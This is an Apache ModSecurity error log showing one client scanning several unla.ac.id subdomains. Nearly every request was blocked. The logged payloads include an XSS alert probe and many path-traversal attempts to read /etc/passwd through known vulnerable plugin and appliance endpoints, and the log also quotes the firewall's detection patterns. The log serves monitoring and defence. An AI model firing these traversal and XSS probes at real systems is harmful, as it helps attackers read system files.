[Tue Aug 29 11:48:06.404017 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/e/ViewImg/index.html"] [unique_id "ZO14hsCo-f0AAAjbw7QAAAAW"]
[Tue Aug 29 11:48:06.405161 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAj12B4AAAAa"]
[Tue Aug 29 11:48:06.416903 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAkdu8cAAAAO"]
[Tue Aug 29 11:48:06.424863 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAklewoAAAAD"]
[Tue Aug 29 11:48:06.441482 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14hsCo-f0AAAjy55wAAAAG"]
[Tue Aug 29 11:48:07.503857 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAhujAEAAAAr"]
[Tue Aug 29 11:48:07.568442 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAkdu8sAAAAO"]
[Tue Aug 29 11:48:07.574758 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjtc60AAAAX"]
[Tue Aug 29 11:48:07.732514 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14h8Co-f0AAAj12CMAAAAa"]
[Tue Aug 29 11:48:07.815872 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjYrCkAAAAK"]
[Tue Aug 29 11:48:07.816897 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14h8Co-f0AAAjM7I8AAAAT"]
[Tue Aug 29 11:48:07.817847 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:key: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/church-admin/display/download.php"] [unique_id "ZO14h8Co-f0AAAkAL-EAAAAU"]
[Tue Aug 29 11:48:08.358901 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjM7JAAAAAT"]
[Tue Aug 29 11:48:08.378315 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjM7JEAAAAT"]
[Tue Aug 29 11:48:08.396778 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAklexAAAAAD"]
[Tue Aug 29 11:48:08.399742 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAjM7JIAAAAT"]
[Tue Aug 29 11:48:08.402848 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO14iMCo-f0AAAj12CYAAAAa"]
[Tue Aug 29 11:48:08.420468 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAkdu80AAAAO"]
[Tue Aug 29 11:48:08.437738 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download.action"] [unique_id "ZO14iMCo-f0AAAkksHwAAAAA"]
[Tue Aug 29 11:48:09.404509 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjYrCwAAAAK"]
[Tue Aug 29 11:48:09.416690 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjM7JYAAAAT"]
[Tue Aug 29 11:48:09.418838 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAklexQAAAAD"]
[Tue Aug 29 11:48:09.422375 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAj12CoAAAAa"]
[Tue Aug 29 11:48:09.435221 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjM7JcAAAAT"]
[Tue Aug 29 11:48:09.460581 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAjbw8EAAAAW"]
[Tue Aug 29 11:48:09.463039 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAj12CwAAAAa"]
[Tue Aug 29 11:48:09.477500 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAkGCXQAAAAE"]
[Tue Aug 29 11:48:09.482170 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14icCo-f0AAAkdu9IAAAAO"]
[Tue Aug 29 11:48:09.482527 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAj12C0AAAAa"]
[Tue Aug 29 11:48:09.496713 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:sub_page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:sub_page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/tutor/views/pages/instructors.php"] [unique_id "ZO14icCo-f0AAAjM7JoAAAAT"]
[Tue Aug 29 11:48:10.354580 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14isCo-f0AAAkAL-sAAAAU"]
[Tue Aug 29 11:48:11.368109 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjbw8oAAAAW"]
[Tue Aug 29 11:48:11.377122 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkksIgAAAAA"]
[Tue Aug 29 11:48:11.388047 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjbw8sAAAAW"]
[Tue Aug 29 11:48:11.410965 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAjtc7cAAAAX"]
[Tue Aug 29 11:48:11.437003 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sysaid/getGfiUpgradeFile"] [unique_id "ZO14i8Co-f0AAAkksIsAAAAA"]
[Tue Aug 29 11:48:12.353502 2023] [:error] [pid 2340] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkksJYAAAAA"]
[Tue Aug 29 11:48:12.376197 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAhujBIAAAAr"]
[Tue Aug 29 11:48:12.377255 2023] [:error] [pid 2345] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/RegistrationRequesterPortType"] [unique_id "ZO14jMCo-f0AAAkpFWwAAAAI"]
[Tue Aug 29 11:48:12.472717 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAkoTf4AAAAH"]
[Tue Aug 29 11:48:12.531522 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:fileName: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/getGfiUpgradeFile"] [unique_id "ZO14jMCo-f0AAAfWN4YAAAAL"]
